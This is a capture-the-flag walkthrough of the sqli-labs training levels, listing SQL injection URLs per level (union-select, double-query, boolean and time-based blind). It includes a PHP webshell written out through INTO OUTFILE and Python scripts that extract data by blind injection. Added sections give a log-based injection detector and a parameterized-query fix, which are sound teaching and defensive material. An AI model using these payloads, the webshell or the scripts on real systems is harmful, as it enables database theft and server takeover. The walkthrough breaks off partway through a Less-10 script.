sqli-labs (Basic Challenges)
Contents
Page-1 (Basic Challenges)
GET
Error based
Less-1 GET - Error based - Single quotes - String (error-based GET single-quote string injection)
Less-2 GET - Error based - Intiger based (error-based GET integer injection)
Less-3 GET - Error based - Single quotes with twist string (error-based GET single-quote string injection with a twist)
Less-4 GET - Error based - Double Quotes - String (error-based GET double-quote string injection)
Error-message (double query) injection
Less-5 GET - Double Injection - Single Quotes - String (double-query GET single-quote string injection)
Less-6 GET - Double Injection - Double Quotes - String (double-query GET double-quote string injection)
Special queries
Less-7 GET - Dump into outfile - String (GET string injection dumping into a file)
Boolean injection
Less-8 GET - Blind - Boolian Based - Single Quotes (boolean-based GET single-quote blind injection)
Time based
Less-9 GET - Blind - Time based. - Single Quotes (time-based GET single-quote blind injection)
Less-10 GET - Blind - Time based - double quotes (time-based double-quote blind injection)
POST
Error based
Less-11 POST - Error Based - Single quotes- String (error-based POST single-quote string injection)
Less-12 POST - Error Based - Double quotes- String-with twist (error-based POST double-quote string injection with a twist)
Error-message (double query) injection
Less-13 POST - Double Injection - Single quotes- String -twist (POST single-quote double-query injection with a twist)
Less-14 POST - Double Injection - Single quotes- String -twist (POST single-quote double-query injection with a twist)
Boolean injection / time-based blind
less-15 POST - Blind- Boolian/time Based - Single quotes (boolean/time-delay POST single-quote blind injection)
Less-16 POST - Blind- Boolian/Time Based - Double quotes (boolean/time-delay POST double-quote blind injection)
Special queries
Less-17 POST - Update Query- Error Based - String (error-based POST injection in an update query)
Header based
Less-18 POST - Header Injection - Uagent field - Error based (error-based POST injection via the User-Agent header)
Less-19 POST - Header Injection - Referer field - Error based (error-based POST injection via the Referer header)
SQL injection notes:
1. When sqlmap is given two parameters, the injection position can be chosen with *; otherwise it injects into the last parameter by default.
2. When the SQL statement's parameter is hard-coded, it cannot be injected.
3. The POST levels use or, because in the POST levels the username supplied first is wrong.
4. Header injection requires a successful login first.
5. When using sqlmap against headers, the injection position can be chosen with *.
Injection procedure:
1. Check whether an injection point exists
2. Determine the parameter type
3. Find the closing sequence for the parameter
4. Find how many columns the backend table has
5. Run a union select to find the output positions
6. Get the current database and version
7. List the tables in the database
8. List the columns in the users table
9. Read the flag column from the table
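The procedure above is also what a defender sees in the access log, one stage per request. The following added example (not from this write-up and not part of sqli-labs) parses constructed log lines whose payloads have the shapes used in the levels below, URL-decodes every query parameter, body parameter and the Referer / User-Agent headers, tags each value with the stage of the procedure it belongs to, and rebuilds the per-client sequence, so the whole flow from one address stands out rather than a single odd request. The log layout, addresses, paths and stage names are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines: combined-log layout with the request body appended as a
# final quoted field. Addresses and paths are placeholders, not the write-up's hosts; the
# payload shapes are the ones the levels use (quote probe, ORDER BY, UNION, header payload).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=1%27 HTTP/1.1" 200 380 "-" "Mozilla/5.0" "-"
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%27%20order%20by%204%20--+ HTTP/1.1" 200 380 "-" "Mozilla/5.0" "-"
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--+ HTTP/1.1" 200 600 "-" "Mozilla/5.0" "-"
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "POST /Less-11/ HTTP/1.1" 200 700 "-" "Mozilla/5.0" "uname=1%27%20or%201=1%23&passwd=a&submit=Submit"
203.0.113.5 - - [01/Jan/2024:10:00:06 +0000] "POST /Less-18/ HTTP/1.1" 200 700 "-" "' and extractvalue(1,concat(0x7e,database(),0x7e)) and '" "uname=admin&passwd=admin&submit=Submit"
203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] "GET /?id=1%22%20and%20sleep(3)%20--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)" "(?P<body>[^"]*)"$'
)

# Signatures for the stages of the procedure, in reporting order. They run on the
# URL-decoded value of each parameter or header, so percent-encoding does not hide them.
STAGES = [
    ("boolean_test", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("error_based", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("double_query", re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("time_based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("file_write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
]
# A lone quote, optionally followed by closing parentheses and a comment marker, is the
# first probe of every level; it is reported only when nothing more specific matched.
QUOTE_PROBE = re.compile(r"""['"]\)*\s*(--\s*|#)?$""")


def classify_value(value):
    """Return the stage names whose signature appears in one decoded input value."""
    stages = [name for name, pattern in STAGES if pattern.search(value)]
    if not stages and QUOTE_PROBE.search(value):
        stages.append("quote_probe")
    return stages


def request_inputs(match):
    """Yield (source, name, decoded value) for every client-controlled field of a request:
    query-string parameters, body parameters, and the Referer / User-Agent headers."""
    query = match["path"].partition("?")[2]
    for source, raw in (("query", query), ("body", match["body"])):
        if raw and raw != "-":
            for pair in raw.split("&"):
                name, _, value = pair.partition("=")
                yield source, unquote_plus(name), unquote_plus(value)
    for source in ("referer", "user_agent"):
        if match[source] not in ("", "-"):
            yield source, source, unquote_plus(match[source])


def analyze_log(text):
    """Parse the log and return one finding per flagged input value."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        for source, name, value in request_inputs(match):
            stages = classify_value(value)
            if stages:
                findings.append({"ip": match["ip"], "time": match["time"], "source": source,
                                 "name": name, "value": value, "stages": stages})
    return findings


def stage_sequence(findings):
    """Per client address, the order in which stages were first seen."""
    seen = {}
    for f in findings:
        order = seen.setdefault(f["ip"], [])
        for stage in f["stages"]:
            if stage not in order:
                order.append(stage)
    return seen


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["source"], f["name"], f["stages"], repr(f["value"]))
    print(stage_sequence(analyze_log(SAMPLE_LOG)))
```

The header fields are decoded and classified like parameters because Less-18 and Less-19 carry the payload in User-Agent and Referer, where a detector that only looks at the query string sees nothing; the per-address sequence is what separates a full enumeration run from a single false positive.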
Less-1 GET - Error based - Single quotes - String (error-based GET single-quote string injection)
1. Check whether an injection point exists
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1'
Error displayed => injection point exists
2. Determine the parameter type
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1 and 1=2
Normal output
The parameter is a string type
3. Find the closing sequence for the parameter
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' and 1=2 --+
Error displayed
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' and 1=1 --+
Normal output => closing sequence found
4. Find how many columns the backend table has
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' order by 3 --+
Normal output
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' order by 4 --+
Error displayed => the table has 3 columns
5. Run a union select to find the display positions
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,3 --+
2 and 3 are displayed => positions 2 and 3 are the display positions
6. Get the database version
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,version() --+
7. List all databases
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
8. List the tables in the database
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="BRqPdnqd"--+
9. List the columns in the ec26n7Hw table
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="BRqPdnqd" --+
10. Read the flag column from the table
https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(flag) from BRqPdnqd--+
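Every step of Less-1 works because the id value is pasted into the SQL text. The added example below (not the write-up's code and not sqli-labs' PHP) rebuilds that query against an in-memory SQLite database, runs the page's own probe strings through the concatenated form and through a bound-parameter form, and adds the two things a fix needs beyond parameterization: an allow-list on the parameter's shape, and a handler that logs database errors instead of echoing them, since echoed driver errors are what the error-based and double-query levels read data from. Table contents and function names are constructed; SQLite stands in for MySQL, so the quote, comment and union behaviour matches while information_schema does not exist here. The same two changes apply to the password value in the update query of Less-17 and to the User-Agent / Referer values of Less-18 and Less-19.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the users table the levels query: three columns (the
    ORDER BY probe tops out at 3) and made-up rows, in memory rather than in MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Less-1 shape: the request parameter is spliced into the SQL text, so a quote in it
    ends the literal and everything after it is parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened: the value is bound as a parameter; the driver never parses it as SQL, so
    quotes, comment markers and UNION keep their literal meaning."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_validated(conn, user_id):
    """Hardened further: allow-list the shape first. An id is an integer, so anything else
    is rejected before a query runs (the integer case of Less-2 gets the same check)."""
    if not isinstance(user_id, str) or not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (int(user_id),)).fetchall()


def handle_request(conn, user_id):
    """Request-handler shape: validated lookup, and database errors are kept for the
    server-side log instead of being returned to the client."""
    try:
        rows = lookup_validated(conn, user_id)
    except ValueError:
        return {"status": 400, "body": "invalid id"}
    except sqlite3.Error as exc:
        return {"status": 500, "body": "internal error", "log": str(exc)}
    return {"status": 200, "body": rows}


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1' and 1=2 -- ", "-1' union select 1,2,3 -- "):
        try:
            vuln = lookup_vulnerable(db, probe)
        except sqlite3.Error as exc:
            vuln = "DB error: %s" % exc
        print("%-30r vulnerable=%r parameterized=%r handler=%r" % (
            probe, vuln, lookup_parameterized(db, probe), handle_request(db, probe)))
```

With the concatenated query the probes behave exactly as recorded above (a lone quote raises a syntax error, and 1=2 empties the result, the union appends the attacker's row); the bound form returns nothing for every probe because the whole string is compared against id as a value, and the validated handler rejects them with a generic 400 before the database is touched.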
Less-2 GET - Error based - Intiger based (error-based GET integer injection)
1. Check whether an injection point exists
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1'
Error displayed => injection point exists
2. Determine the parameter type
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1 and 1=2
Error displayed => numeric type
3. Find how many columns the backend table has
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1 order by 3
Normal output
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1 order by 4
Error displayed => the table has 3 columns
4. Run a union select to find the display positions
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,3 --+
2 and 3 are displayed => positions 2 and 3 are the display positions
5. Get the current database and version
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,database(),version() --+
6. List the tables in the database
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
7. List the columns in the ec26n7Hw table
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="ec26n7Hw" --+
8. Read the flag column from the table
https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,group_concat(id,flag) from ec26n7Hw --+
Less-3 GET - Error based - Single quotes with twist string (error-based GET single-quote string injection with a twist)
1. Check whether an injection point exists
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1'
Error displayed => injection point exists
2. Determine the parameter type
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1 and 1=2
Normal output => string type
3. Find the closing sequence for the parameter
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1' and 1=2
Error displayed
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1' and 1=1
Error displayed => the first closing character is correct
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1') and 1=1
Normal output => closing sequence found
4. Find how many columns the backend table has
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1') order by 3
Normal output
https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1) order by 4
Error displayed => 3 columns
5. Run a union select to find the display positions
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,3 --+
2 and 3 are displayed => positions 2 and 3 are the display positions
6. Get the current database and version
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,database(),version() --+
7. List the tables in the database
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
8. List the columns in the jCKIHUzE table
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="jCKIHUzE" --+
9. Read the flag column from the table
https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(flag) from jCKIHUzE --+
Less-4 GET - Error based - Double Quotes - String (error-based GET double-quote string injection)
1. Check whether an injection point exists
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3' --+
Normal output
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" --+
Error displayed => injection point exists
2. Determine the parameter type
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3 and 1=2 --+
Normal output => string-type injection
3. Find the closing sequence for the parameter
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" and 1=2 --+
Error displayed
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" and 1=1 --+
Error displayed => the first closing character is correct
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") and 1=1 --+
Normal output => closing sequence found
4. Find how many columns the backend table has
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") order by 3 --+
Normal output
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") order by 4 --+
Error displayed => 3 columns
5. List the tables in the database
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
6. List the columns in the NCdmJewX table
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="NCdmJewX" --+
7. Read the flag column from the table
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(flag) from NCdmJewX --+
Less-5 GET - Double Injection - Single Quotes - String (double-query GET single-quote string injection)
1. Check whether an injection point exists
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1'
Error displayed => injection point exists
2. Determine the parameter type
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1 and 1=2
Normal output => string type
3. Find the closing sequence for the parameter
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' and 1=2 --+
Error displayed
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' and 1=1 --+
Normal output => closing sequence found
4. Find how many columns the backend table has
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' order by 3 --+
Normal output
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' order by 4 --+
Error displayed => 4 display positions
5. Run a double-query injection to get the current database name
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union SELECT null,count(*),concat((database()),floor(rand()*2))as a from information_schema.tables group by a --+
6. List the tables in the database
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 0,1),floor(rand()*2))as a from information_schema.tables group by a --+
8. List the columns in the tG7wdqTJ table
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name="RqSknMg2" limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+
9. Read the flag column from the table
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select flag from RqSknMg2 limit 3,1),floor(rand()*2))as a from information_schema.tables group by a --+
Less-6 GET - Double Injection - Double Quotes - String (double-query GET double-quote string injection)
1. Check whether an injection point exists
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1"
Error displayed => injection point exists
2. Determine the parameter type
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1 and 1=2 --+
Normal output => string-type injection
3. Find the closing sequence for the parameter
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" and 1=2 --+
Error displayed
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1 and 1=1 --+
Normal output => closing sequence found
4. Find how many columns the backend table has
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" order by 3 --+
Normal output
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" order by 4--+
Error displayed => 3 columns
5. Run a double-query injection to get the current database
https://636-22d36cf9-39bc-42ee-a65d-21cac444c7fb.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((database()),floor(rand()*2))as a from information_schema.tables group by a --+
6. List the tables in the current database
https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+
7. List the columns in the fThDtk9a table
https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name="fThDtk9a" limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+
8. Read the flag column from the table
https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select flag from fThDtk9a limit 3,1),floor(rand()*2))as a from information_schema.tables group by a --+
Less-7 GET - Dump into outfile - String (GET string injection dumping into a file)
1. Check whether an injection point exists
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1'
Error displayed => injection point exists
2. Determine the parameter type
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1 and 1=2 --+
Normal output => string type
3. Find the closing sequence for the parameter
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1' and 1=2 --+
Error displayed
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1' and 1=1 --+
Error displayed => the first closing character is correct
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) and 1=1 --+
Normal output => closing sequence found
4. Find how many columns the backend table has
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) order by 3 --+
Normal output
https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) order by 4 --+
Error displayed => 3 columns
5. File-export injection: the webshell cannot be uploaded, so boolean injection is used instead.
?id=1')) union select 1,2,'<?php @eval($_POST["123"]);?>' into outfile "//var//lib//mysql//shell.php" -–+
Boolean injection with a borrowed Python script

    import requests
    import time

    a = time.time()


    def blind_char(expr, i, low, high):
        # Binary search the ASCII code of character i of the SQL expression expr
        # between low and high; the page contains "You are in" when the injected
        # comparison holds.
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1')) and ascii(substr(%s,%d,1))>%d -- 1" % (expr, i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:
                # greater than mid: low = mid + 1 and keep searching
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            # not greater, so less than or equal: ask "less than?" first; if not, it is equal
            payload = "?id=1')) and ascii(substr(%s,%d,1))<%d -- 1" % (expr, i, mid)
            r = requests.get(url=urls + payload)
            if "You are in" in r.text:
                # strictly less than mid
                high = mid - 1
                mid = int((low + high) / 2)  # re-centre mid
                continue
            # only equality remains
            return chr(mid)


    def blind_string(expr, length, low, high, show_progress=False):
        # Recover the first `length` characters of expr one character at a time.
        result = ''
        for i in range(1, length + 1):
            result += blind_char(expr, i, low, high)
            if show_progress:
                print(result)
        return result


    def database_name():
        # 48 ~ 122
        print('database_name:' + blind_string('database()', 8, 48, 122))


    def table_name():
        # 48 ~ 122
        print('table_name:' + blind_string(
            '(select table_name from information_schema.tables where table_schema=database() limit 0,1)',
            8, 48, 122))


    def coulmn_name():
        print('column_name:' + blind_string(
            "(select column_name from information_schema.columns where table_name='1BP8qvFx' limit 1,1)",
            8, 1, 128))


    def flag():
        print('flag:' + blind_string('(select flag from 1BP8qvFx limit 3,1)', 42, 1, 128, show_progress=True))


    if __name__ == '__main__':
        urls = 'https://636-2f3d6806-1ccd-4ae6-96be-4062e1d1f155.do-not-trust.hacking.run/'
        # database_name()
        # table_name()  # once the table name is found, update the code above and run the next step
        # coulmn_name()
        flag()
        b = time.time()
        print('Binary search: running time: %s seconds' % (b - a))
Less-8 GET - Blind - Boolian Based - Single Quotes (boolean-based GET single-quote blind injection)
1. Check whether an injection point exists
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1'
Error displayed => injection point exists
2. Determine the parameter type
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1 and 1=2
Normal output => string type
3. Find the closing sequence for the parameter
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' and 1=2 --+
Error displayed
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' and 1=1 --+
Normal output => closing sequence found
4. Find how many columns the backend table has
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' order by 3 --+
Normal output
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' order by 4 --+
Error displayed => 3 display positions
5. Boolean blind injection
Python script
    import requests
    import time

    a = time.time()


    def blind_char(expr, i, low, high):
        # Binary search the ASCII code of character i of the SQL expression expr
        # between low and high; the page contains "You are in" when the injected
        # comparison holds.
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1' and ascii(substr(%s,%d,1))>%d -- 1" % (expr, i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:
                # greater than mid: low = mid + 1 and keep searching
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            # not greater, so less than or equal: ask "less than?" first; if not, it is equal
            payload = "?id=1' and ascii(substr(%s,%d,1))<%d -- 1" % (expr, i, mid)
            r = requests.get(url=urls + payload)
            if "You are in" in r.text:
                # strictly less than mid
                high = mid - 1
                mid = int((low + high) / 2)  # re-centre mid
                continue
            # only equality remains
            return chr(mid)


    def blind_string(expr, length, low, high, show_progress=False):
        # Recover the first `length` characters of expr one character at a time.
        result = ''
        for i in range(1, length + 1):
            result += blind_char(expr, i, low, high)
            if show_progress:
                print(result)
        return result


    def table_name():
        # 48 ~ 122
        name = blind_string(
            '(select table_name from information_schema.tables where table_schema=database() limit 0,1)',
            8, 48, 122)
        print('table_name:' + name)
        return name


    def flag(table):
        # the table name recovered by table_name() is spliced into the flag query
        print('flag:' + blind_string('(select flag from ' + table + ' limit 3,1)', 42, 1, 128, show_progress=True))


    if __name__ == '__main__':
        urls = 'https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/'
        flag(table_name())
        b = time.time()
        print('Binary search: running time: %s seconds' % (b - a))
Less-9 GET - Blind - Time based. - Single Quotes (time-based GET single-quote blind injection)
1. Check whether an injection point exists
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1'
Normal output
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1"
Normal output
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
Delayed response => injection point exists
2. Determine the parameter type
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1 and sleep(3) --+
Normal output
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
Delayed response => string-type injection
3. Find the closing sequence for the parameter
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
Delayed response => closing sequence found
4. Guess the database name length
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
5. Guess the database name
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select database()),1)='s',sleep(3),1) --+
6. Guess the table name
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+
7. Guess the column name
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+
8. Guess the data
?id=1' and if(left((select flag from paNrhmRA limit 0,1),1)='d',sleep(3),1) --+
Less-10 GET - Blind - Time based - double quotes (time-based double-quote blind injection)
1. Check whether an injection point exists
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1'
Normal output
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1"
Normal output
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1' and sleep(3) --+
Normal output
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+
Delayed response => injection point exists
2. Determine the parameter type
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1 and sleep(3) --+
Normal output
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+
Delayed response => string type
3. Find the closing sequence for the parameter
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+
Delayed response => closing sequence found
4. Time-based blind injection
Python script
    import requests
    import time

    url = 'https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1'
    # subqueries for the successive steps; swap `database` below for `tables` or `column`
    # and replace "table_name" in `column` with the table found in the previous step
    database = 'select schema_name from information_schema.schemata'
    tables = 'select table_name from information_schema.tables where table_schema=database()'
